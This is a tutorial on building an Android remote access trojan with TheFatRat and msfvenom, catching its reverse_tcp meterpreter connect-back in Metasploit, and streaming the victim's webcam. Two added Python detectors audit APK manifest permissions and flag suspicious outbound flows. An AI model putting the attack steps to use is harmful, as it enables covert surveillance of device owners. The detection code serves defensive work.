RAT (Remote Access Trojan): malicious code that looks legitimate but gives an attacker control of the system. The infected system can be harmed whenever the attacker wants: the RAT can access confidential information, use the webcam and microphone, take screenshots, read, write and alter data, and so on.
FatRat (TheFatRat) is a tool for building malware with msfvenom from the Metasploit Framework. It compiles the malware together with a payload and produces a RAT for different platforms, depending on which payload is used and what kind of malware we want to make.
This tool can be used as follows:
Step 1: run the command ‘fatrat’.
It starts by checking whether all the modules it needs are available.
Step 2: after the check, the tool starts and asks how you want to create the backdoor.
I used ‘make a backdoor using msfvenom’.
Step 3: it asks which platform the file is for (e.g. for Windows we need a .exe file).
Here I chose to make an Android file, i.e. one with the ‘.apk’ extension.
Step 4: it shows the local IPv4 and IPv6 addresses and gives the option to set the local host IP (LHOST).
Here I set LHOST to my local IPv4 address.
Then it asks to set LPORT (local port); we can choose any free port from the 65535 available.
Step 5: after LPORT is entered it asks for a name for the output file.
We can give the file any name.
Step 6: after the name is entered it asks which payload to use.
android/meterpreter/reverse_http: Run a meterpreter server in Android. Tunnel communication over HTTP
android/meterpreter/reverse_https: Run a meterpreter server in Android. Tunnel communication over HTTPS
android/meterpreter/reverse_tcp: Run a meterpreter server in Android. Connect back stager
android/meterpreter_reverse_http: Connect back to attacker and spawn a Meterpreter shell
android/meterpreter_reverse_https: Connect back to attacker and spawn a Meterpreter shell
android/meterpreter_reverse_tcp: Connect back to the attacker and spawn a Meterpreter shell
Here we use the third option, android/meterpreter/reverse_tcp, which is the connect-back stager.
Step 7: after the payload is entered all the information is filled in and the tool starts building the .apk file.
When it is done it asks whether we want to create a listener file for msfconsole for future use (y/n).
The listener file contains the msfconsole configuration: the payload, LHOST and LPORT.
It will be stored in ‘/TheFatRat/config/listeners’.
I typed ‘y’.
Then it asks for a name for the config file.
After entering the name and pressing Enter we reach the next step, which reports success and the locations of the RAT file and the config file.
Now our file is ready to use.
Once it has been installed on a system and the installation is done, the Metasploit Framework takes over.
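A defender looking at an installed file like this one starts from the capabilities the text lists (webcam, microphone, confidential data, reading and writing files): all of them show up as permissions in the APK's AndroidManifest.xml. The following Python is an added example, not part of the original walkthrough or of TheFatRat; it assumes the manifest has already been decoded to text (for instance with apktool) and uses two constructed manifests as input. The permission set it flags is a heuristic chosen here, not a signature of any particular payload.

```python
import xml.etree.ElementTree as ET

# ElementTree expands the "android:" prefix to the full namespace URI.
ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Permissions that correspond to the RAT capabilities described in the text:
# webcam, microphone, confidential information, reading and writing data.
SURVEILLANCE_PERMS = {
    "android.permission.CAMERA": "webcam",
    "android.permission.RECORD_AUDIO": "microphone",
    "android.permission.READ_SMS": "read SMS",
    "android.permission.READ_CONTACTS": "read contacts",
    "android.permission.READ_CALL_LOG": "read call log",
    "android.permission.ACCESS_FINE_LOCATION": "location",
    "android.permission.READ_EXTERNAL_STORAGE": "read files",
    "android.permission.WRITE_EXTERNAL_STORAGE": "write files",
}

# Constructed sample manifests (not taken from any real APK).
SUSPICIOUS_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.game">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.CAMERA"/>
  <uses-permission android:name="android.permission.RECORD_AUDIO"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <application android:label="Game"/>
</manifest>
"""

BENIGN_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.torch">
  <uses-permission android:name="android.permission.CAMERA"/>
  <application android:label="Torch"/>
</manifest>
"""


def permissions_of(manifest_xml):
    """Return the set of permission names declared with <uses-permission>."""
    root = ET.fromstring(manifest_xml)
    return {
        el.get(ANDROID_NS + "name")
        for el in root.iter("uses-permission")
        if el.get(ANDROID_NS + "name")
    }


def audit_manifest(manifest_xml, min_capabilities=3):
    """Flag an app that can reach the network and holds several surveillance
    capabilities at once. The threshold is a heuristic: legitimate messaging
    apps also request many of these, so the result is a triage hint, not a verdict."""
    perms = permissions_of(manifest_xml)
    capabilities = sorted(SURVEILLANCE_PERMS[p] for p in perms if p in SURVEILLANCE_PERMS)
    has_network = "android.permission.INTERNET" in perms
    persists = "android.permission.RECEIVE_BOOT_COMPLETED" in perms
    return {
        "network": has_network,
        "boot_persistence": persists,
        "capabilities": capabilities,
        "suspicious": has_network and len(capabilities) >= min_capabilities,
    }


if __name__ == "__main__":
    for label, manifest in (("game", SUSPICIOUS_MANIFEST), ("torch", BENIGN_MANIFEST)):
        print(label, audit_manifest(manifest))
```

To run it on a real file, decode the APK first (e.g. `apktool d app.apk`, assuming apktool is installed) and pass the text of the resulting AndroidManifest.xml to `audit_manifest`. The combination of network access, several surveillance permissions and boot persistence is what makes a "game" worth a closer look; a torch app that only asks for the camera flash is not flagged.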
Metasploit Framework: a software platform for developing, testing, and executing exploits.
Step 8: open the Metasploit Framework with the command ‘msfconsole’.
After this command the Metasploit console opens.
Step 9: now select the multi handler with the ‘use’ command.
Command: use multi/handler
Step 10: once multi/handler is loaded we set the payload with the set command.
Command: set payload [payload]
After the payload is set, we set LHOST and LPORT (the listener file has the correct values).
We can use the ‘show options’ command to check which other options the selected payload requires.
Step 11: run the ‘exploit’ command.
The connection is established and we now have remote access to the device.
We can use the ‘help’ command in meterpreter to list the commands for accessing the system.
There are many commands for accessing data, hiding the application, deleting the application, etc.
I chose the command ‘webcam_stream’.
After pressing Enter a browser opens and we can see what the webcam of the infected device sees.
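The session above only exists because the infected device opened a connection back to LHOST:LPORT, so the network is where a defender can see it: the reverse_tcp stager holds one long-lived session to whatever port was chosen, and the HTTP/HTTPS variants in the payload list tunnel their traffic over web ports, which (as assumed here) means the device checks in with the same host at a regular interval. The following Python is an added example, not part of the original walkthrough or of Metasploit; it runs over a constructed outbound-connection log (documentation IP ranges, a sample port of 4444) and flags flows to uncommon ports and flows with suspiciously regular timing.

```python
from collections import defaultdict, namedtuple
from datetime import datetime
from statistics import mean, pstdev

Connection = namedtuple("Connection", "ts src dst dport")

# Ports a phone is normally expected to talk to (web, DNS, NTP, Google push);
# a connect-back to anything else deserves a second look.
COMMON_PORTS = {80, 443, 53, 123, 5228}

# Constructed log, not real traffic. Columns: timestamp source destination port
SAMPLE_LOG = """
# 10.0.0.23 holds one session to an uncommon port (reverse_tcp-style connect-back)
2024-05-01T10:00:00 10.0.0.23 192.0.2.10 4444
# 10.0.0.24 checks in with the same host every 60 seconds over 443
2024-05-01T10:00:00 10.0.0.24 192.0.2.10 443
2024-05-01T10:00:05 10.0.0.25 203.0.113.5 443
2024-05-01T10:00:09 10.0.0.25 203.0.113.5 443
2024-05-01T10:00:30 10.0.0.25 198.51.100.53 53
2024-05-01T10:01:00 10.0.0.24 192.0.2.10 443
2024-05-01T10:02:00 10.0.0.24 192.0.2.10 443
2024-05-01T10:03:00 10.0.0.24 192.0.2.10 443
2024-05-01T10:03:40 10.0.0.25 203.0.113.5 443
2024-05-01T10:04:00 10.0.0.24 192.0.2.10 443
2024-05-01T10:12:02 10.0.0.25 203.0.113.5 443
"""


def parse_log(lines):
    """Yield Connection records, skipping blank lines and # comments."""
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, src, dst, dport = line.split()
        yield Connection(datetime.fromisoformat(ts), src, dst, int(dport))


def find_suspicious_flows(lines, min_connections=3, max_jitter=0.2):
    """Group connections by (src, dst, port) and report flows that either use an
    uncommon port or repeat at a near-constant interval (low jitter)."""
    flows = defaultdict(list)
    for c in parse_log(lines):
        flows[(c.src, c.dst, c.dport)].append(c.ts)

    findings = []
    for (src, dst, dport), stamps in flows.items():
        reasons = []
        if dport not in COMMON_PORTS:
            reasons.append(f"uncommon destination port {dport}")
        if len(stamps) >= min_connections:
            stamps.sort()
            gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
            avg = mean(gaps)
            # Coefficient of variation: human browsing is bursty, a timer is not.
            if avg > 0 and pstdev(gaps) / avg <= max_jitter:
                reasons.append(f"regular check-in about every {avg:.0f}s ({len(stamps)} connections)")
        if reasons:
            findings.append({"src": src, "dst": dst, "dport": dport, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_suspicious_flows(SAMPLE_LOG.splitlines()):
        print(f"{f['src']} -> {f['dst']}:{f['dport']}: " + "; ".join(f["reasons"]))
```

On the sample log, 10.0.0.23 is reported for its port and 10.0.0.24 for its clockwork 60-second check-ins, while 10.0.0.25's irregular browsing to a web host is left alone. Real logs would come from a firewall or NetFlow export; the thresholds are starting points to tune against a baseline of the network's normal traffic.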